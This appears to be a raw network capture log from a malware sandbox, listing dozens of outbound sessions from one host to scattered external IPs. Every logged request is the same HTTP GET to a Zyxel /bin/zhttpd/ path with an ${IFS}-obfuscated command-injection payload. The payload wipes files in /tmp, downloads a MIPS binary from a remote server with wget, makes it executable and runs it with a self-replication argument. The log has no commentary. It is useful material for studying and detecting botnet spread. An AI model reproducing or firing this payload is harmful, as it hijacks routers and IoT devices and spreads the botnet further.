                                                        Jan 28, 2024 10:12:45.264143944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2512192.168.2.1449882164.243.199.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264179945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2513192.168.2.144720469.121.85.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264202118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2514192.168.2.1438226168.143.233.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264235020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2515192.168.2.1446586146.135.62.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264285088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2516192.168.2.1456330136.84.108.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264316082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2517192.168.2.1460416119.38.153.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264368057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2518192.168.2.1444030221.187.117.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264399052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2519192.168.2.1432976195.165.181.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264425993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2520192.168.2.1450190144.169.48.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264480114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2521192.168.2.144453074.146.162.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264534950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2522192.168.2.1460804151.111.125.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264574051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2523192.168.2.1446564167.201.160.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264616013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2524192.168.2.1452806218.147.217.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264633894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2525192.168.2.1451878109.102.180.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264662981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2526192.168.2.1446610148.140.205.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264699936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2527192.168.2.1458196146.74.147.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264741898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2528192.168.2.1444596152.111.246.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264763117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2529192.168.2.1448068110.51.245.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264797926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2530192.168.2.1450528171.66.4.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264820099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2531192.168.2.1445514158.169.168.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264872074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2532192.168.2.145067051.254.104.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264899969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2533192.168.2.1440618180.4.177.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264950991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2534192.168.2.1447500160.157.78.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265007973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2535192.168.2.1456706187.58.10.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265023947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2536192.168.2.144668839.129.3.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265063047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2537192.168.2.1447550195.255.164.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265114069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2538192.168.2.1451056110.193.82.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265156984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2539192.168.2.1442470174.15.164.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265207052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2540192.168.2.1447118193.143.9.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265239000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2541192.168.2.1458224114.198.103.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265286922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2542192.168.2.1452640137.13.26.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265333891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2543192.168.2.1433108150.195.163.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265345097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2544192.168.2.144961039.69.147.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265403032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2545192.168.2.1439728183.46.32.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265438080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2546192.168.2.1456098159.65.54.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265459061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2547192.168.2.1438178171.50.68.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265486956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2548192.168.2.1460610107.207.230.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265531063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2549192.168.2.144727245.102.42.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265575886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2550192.168.2.145855859.242.121.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265625000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2551192.168.2.145589451.145.100.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265649080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2552192.168.2.143353417.8.136.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265695095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2553192.168.2.144055063.6.196.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265728951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2554192.168.2.145782250.51.41.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265764952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2555192.168.2.1436902145.148.29.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265793085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2556192.168.2.1455314204.211.177.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265834093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2557192.168.2.1449690146.181.214.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265882015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2558192.168.2.145968240.17.93.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265929937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2559192.168.2.145719049.155.158.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265948057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2560192.168.2.1434830203.206.0.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.265988111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2561192.168.2.144680238.187.131.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266026020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2562192.168.2.1453060160.191.179.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266043901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2563192.168.2.1439356213.106.237.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266087055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2564192.168.2.1457364195.20.135.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266103983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2565192.168.2.1443276137.119.229.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266163111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2566192.168.2.143650418.52.214.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266190052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2567192.168.2.1437948165.45.35.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266237974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2568192.168.2.143600091.158.236.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266283989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2569192.168.2.1460208120.222.81.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266324997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2570192.168.2.1460328222.13.206.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266345978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2571192.168.2.145273827.96.242.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.266398907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2572192.168.2.144190678.122.146.36443
                                                        TimestampBytes transferredDirectionData
